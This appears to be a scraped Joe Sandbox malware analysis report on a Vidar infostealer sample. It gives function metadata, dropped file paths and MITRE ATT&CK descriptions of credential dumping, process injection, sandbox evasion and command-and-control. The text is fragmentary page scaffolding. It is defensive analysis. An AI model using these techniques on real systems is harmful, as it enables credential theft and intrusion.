Instruction Fuzzy Hash: 5EF030351402489FDB10DF58D466BA43BA2EB45B55F089084E94C0F392C771D846CBD1

Function 0061140E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00611426
GlobalMemoryStatusEx.KERNEL32(?), ref: 00611439

Strings

@, xrefs: 00611432

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus_memset
String ID: @
API String ID: 587104284-2766056989
Opcode ID: fa1adc664e1eedd523498cf9c69671bf82aca032956f6d64d93a4f67a20f6a0a
Instruction ID: 30643d7de31a0a12754cc3301b3e2550fd993043bd950bade01ab41f710a3597
Opcode Fuzzy Hash: fa1adc664e1eedd523498cf9c69671bf82aca032956f6d64d93a4f67a20f6a0a
Instruction Fuzzy Hash: ABE080F4D0020CDBDB40EFB4E907B5D73F99B04704F5000299A09E7181D674BA048755

Function 6C440DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C440DF5
TlsGetValue.KERNEL32 ref: 6C440E2D
TlsGetValue.KERNEL32 ref: 6C440E58
TlsGetValue.KERNEL32 ref: 6C440E84

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 1f41435a59ff32203b2043ffb993940e12bcd8a04fd4a51fa29de3b0605bc6cc
Instruction ID: a124b25e9b9db2c6d6d3cde6beb93b16deb24b47eb01aaaf7d4b8f59ad61dff6
Opcode Fuzzy Hash: 1f41435a59ff32203b2043ffb993940e12bcd8a04fd4a51fa29de3b0605bc6cc
Instruction Fuzzy Hash: BB31C2716453958BFB10EF38C944E597BB4FF56309F328629D8988BB10EB34D4B5CA82

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAAFBFBAAKEC\AAKKKEBFC

C:\ProgramData\BAAFBFBAAKEC\DHJKJK

C:\ProgramData\BAAFBFBAAKEC\EBAFHC

C:\ProgramData\BAAFBFBAAKEC\EHIDAK

C:\ProgramData\BAAFBFBAAKEC\FIIEHJDBK

C:\ProgramData\BAAFBFBAAKEC\GIJECG

C:\ProgramData\BAAFBFBAAKEC\HCBGDG

Windows Analysis Report
file.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre